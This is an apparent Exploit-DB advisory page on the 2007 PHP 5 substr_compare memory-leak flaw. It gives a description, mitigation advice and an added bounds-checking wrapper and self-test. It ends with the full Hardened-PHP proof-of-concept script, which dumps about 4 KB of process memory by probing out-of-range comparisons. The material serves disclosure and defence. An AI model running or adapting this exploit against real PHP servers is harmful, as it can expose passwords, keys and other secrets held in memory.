Vendor: PHP
Author: Stefan Esser
CVSS: 5.5 (MEDIUM)
Type: Information Leak
CWE: 200
Product Name: PHP
Affected Version From: PHP 5
Affected Version To: PHP 5
Patch Exists: NO
Related CWE:
CPE: a:php:php
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2007

PHP 5 – substr_compare Information Leak Vulnerability

This vulnerability allows an attacker to leak the contents of process memory through the substr_compare function in PHP 5. Because the function does not check the supplied offset and length against the length of the string being compared, a comparison can be made to read bytes beyond the end of that string, and the comparison result reveals those bytes one at a time. This can expose sensitive information held by the process, such as passwords or cryptographic keys.

Mitigation:

Upgrade to a version of PHP that has patched this vulnerability. Check with the vendor for available patches and updates.
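As an added example (not part of the advisory and not Hardened-PHP Project code), the following PHP shows the two checks a defender wants while the upgrade is pending: a wrapper that bounds-checks offset and length against the main string before comparing, so the comparison can never reach bytes outside the string, and a self-test that reports whether the running interpreter rejects an out-of-range offset. The function names are my own; the wrapper follows the documented substr_compare() argument semantics and needs PHP 5.3 or later (for the closure).

```php
<?php
// Added example, not from the advisory or the Hardened-PHP PoC.
// Written without type hints so it also runs on PHP 5.3+, where the
// vulnerable interpreters live; it runs unchanged on PHP 7 and 8.

/**
 * Compare $main (from byte $offset) with $str for up to $length bytes.
 * Returns <0, 0 or >0 like substr_compare(), or false on bad arguments.
 * Every byte touched lies inside a PHP string of known length, so the
 * comparison cannot read past a buffer regardless of interpreter version.
 */
function bounded_substr_compare($main, $str, $offset, $length = null, $ci = false)
{
    $mainLen = strlen($main);

    // Negative offsets count back from the end, as substr_compare() documents.
    if ($offset < 0) {
        $offset = max(0, $mainLen + $offset);
    }
    // Reject an offset past the end: this is the check the vulnerable
    // substr_compare() did not perform before computing its read window.
    if ($offset > $mainLen) {
        trigger_error('bounded_substr_compare(): offset exceeds main string length', E_USER_WARNING);
        return false;
    }
    if ($length !== null && $length < 0) {
        trigger_error('bounded_substr_compare(): length must be non-negative', E_USER_WARNING);
        return false;
    }

    // Clamp the compare window to what actually exists in both strings.
    $remaining = $mainLen - $offset;
    if ($length === null) {
        $length = max(strlen($str), $remaining);
    }
    // (string) cast: substr() returns false instead of '' on PHP < 7.
    $a = (string) substr($main, $offset, min($length, $remaining));
    $b = (string) substr($str, 0, min($length, strlen($str)));

    return $ci ? strcasecmp($a, $b) : strcmp($a, $b);
}

/**
 * Self-test: does this interpreter refuse an out-of-range offset?
 * Returns true when the call is rejected (warning plus false on PHP 5.2.1+
 * and 7.x, ValueError on PHP 8), false when substr_compare() silently
 * returns an integer. Nothing is printed or retained from the call itself.
 */
function interpreter_rejects_out_of_range_offset()
{
    $warned = false;
    set_error_handler(function ($errno) use (&$warned) {
        $warned = true;   // swallow the warning, just record that it fired
        return true;
    });
    $rejected = false;
    try {
        // Offset 4 is one byte past the 3-byte string; length 1.
        $r = substr_compare('abc', 'a', 4, 1);
        $rejected = ($r === false) || $warned;
    } catch (Exception $e) {   // not expected from substr_compare()
        $rejected = true;
    } catch (Error $e) {       // PHP 8 throws ValueError here
        $rejected = true;
    }
    restore_error_handler();
    return $rejected;
}

// Constructed usage, not from the page:
var_dump(bounded_substr_compare('Hello world', 'world', 6));          // int(0)
var_dump(bounded_substr_compare('Hello world', 'World', 6, 5, true)); // int(0)
var_dump(bounded_substr_compare('abc', 'a', 10, 1));                  // warning, then bool(false)
var_dump(interpreter_rejects_out_of_range_offset());                  // bool(true) on a patched build
```

The wrapper is the useful part for application code that cannot yet move off an affected build: route every comparison whose offset or length comes from user input through it. The self-test is the check to run once per host after upgrading, to confirm the interpreter itself now refuses the out-of-range offset instead of reading beyond the string.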
Source

Exploit-DB raw data:

<?php
  ////////////////////////////////////////////////////////////////////////
  //  _  _                _                     _       ___  _  _  ___  //
  // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \ //
  // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/ //
  // |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|   //
  //                                                                    //
  //         Proof of concept code from the Hardened-PHP Project        //
  //                   (C) Copyright 2007 Stefan Esser                  //
  //                                                                    //
  ////////////////////////////////////////////////////////////////////////
  //        PHP 5 - substr_compare Information Leak Vulnerability       //
  ////////////////////////////////////////////////////////////////////////

  // This is meant as a protection against remote file inclusion.
  die("REMOVE THIS LINE");

  $sizeofHashtable = 39;
  $maxlong = 0x7fffffff;
  if (is_int($maxlong+1)) {
    $sizeofHashtable = 67;
    $maxlong = 0x7fffffffffffffff;
  }

  $memdump = str_repeat("A", 4096);
  for ($i=0; $i<40; $i++) $d[] = array();
  unset($d[20]);
  $x = str_repeat("A", $sizeofHashtable);
  
  // If the libc memcmp leaks the information use it
  // otherwise we only get a case insensitive memdump
  $b = substr_compare(chr(65),chr(0),0,1,false) != 65;

  for ($i=0; $i<4096; $i++) {
    $y = substr_compare($x, chr(0), $i+1, $maxlong, $b);
    $Y = substr_compare($x, chr(1), $i+1, $maxlong, $b);
    if ($y-$Y == 1 || $Y-$y==1){
      $y = chr($y);
      if ($b && strtoupper($y)!=$y) {
        if (substr_compare($x, $y, $i+1, $maxlong, false)==-1) {
          $y = strtoupper($y);
        }
      }
      $memdump[$i] = $y;
    } else {
      $memdump[$i] = chr(0);
    }
  }
  
  echo "memdump\n---------\n\n";
  
  for ($b=0; $b<strlen($memdump); $b+=16) {
    printf("%08x: ", $b);
    for ($i=0; $i<16; $i++) {
      printf ("%02x ", ord($memdump[$b+$i]));
    }
    for ($i=0; $i<16; $i++) {
      $c = ord($memdump[$b+$i]);
      if ($c >= 127 || $c < 32) {
        $c = ord(".");
      }
      printf ("%c", $c);
    }
    printf("\n");
  }

?>

# milw0rm.com [2007-03-07]